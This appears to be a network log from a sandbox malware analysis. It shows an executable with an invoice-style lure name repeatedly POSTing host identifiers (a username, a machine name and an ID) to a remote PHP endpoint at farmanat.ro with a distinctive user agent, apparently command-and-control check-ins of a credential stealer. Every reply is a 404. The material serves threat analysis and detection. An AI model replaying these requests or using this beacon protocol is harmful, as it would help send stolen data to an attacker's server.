Nov 25, 2021 10:55:20.138106108 CET	7490	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:20.172432899 CET	7490	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:20.223124027 CET	7490	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
855	192.168.11.20	50703	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:20.632791042 CET	7491	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:20.667056084 CET	7491	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:20.720868111 CET	7492	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
856	192.168.11.20	50704	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:21.146266937 CET	7492	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:21.179838896 CET	7493	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:21.229245901 CET	7493	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
857	192.168.11.20	50705	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:21.663105965 CET	7494	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:21.697355986 CET	7494	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:21.747150898 CET	7494	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
858	192.168.11.20	50706	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:22.180632114 CET	7495	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:22.215109110 CET	7495	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:22.267002106 CET	7496	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
859	192.168.11.20	50707	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:22.690104961 CET	7496	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:22.723547935 CET	7497	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:22.777199030 CET	7497	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.11.20	49923	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:54.400388002 CET	6434	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:54.433872938 CET	6434	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:54.490242004 CET	6434	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
860	192.168.11.20	50708	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:23.208795071 CET	7498	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:23.242975950 CET	7498	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:23.298696995 CET	7498	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
861	192.168.11.20	50709	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:23.713367939 CET	7499	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:23.746927977 CET	7499	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:23.799150944 CET	7500	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
862	192.168.11.20	50710	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:24.216252089 CET	7500	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:24.249738932 CET	7501	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:24.304250956 CET	7501	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
863	192.168.11.20	50711	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:24.719605923 CET	7502	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:24.753768921 CET	7502	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:24.807768106 CET	7502	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
864	192.168.11.20	50712	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:25.235141039 CET	7503	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:25.269308090 CET	7503	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:25.319226980 CET	7504	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
865	192.168.11.20	50713	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:25.759053946 CET	7504	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:25.792563915 CET	7505	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:25.841828108 CET	7505	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
866	192.168.11.20	50714	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:26.277776003 CET	7506	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:26.312141895 CET	7506	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:26.363966942 CET	7506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
867	192.168.11.20	50715	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:26.773686886 CET	7507	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:26.807885885 CET	7507	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:26.857871056 CET	7508	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
868	192.168.11.20	50716	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:27.262392044 CET	7508	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:27.295998096 CET	7509	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:27.345201969 CET	7509	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
869	192.168.11.20	50717	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:27.777040958 CET	7510	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:27.811363935 CET	7510	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:27.861280918 CET	7510	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.11.20	49924	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:54.951317072 CET	6435	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:54.984689951 CET	6435	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:55.038609028 CET	6436	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
870	192.168.11.20	50718	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:28.274621964 CET	7511	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:28.308180094 CET	7511	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:28.358278990 CET	7512	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
871	192.168.11.20	50719	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:28.757055044 CET	7512	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:28.791507006 CET	7513	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:28.842794895 CET	7513	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
872	192.168.11.20	50720	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:29.273209095 CET	7514	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:29.307553053 CET	7514	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
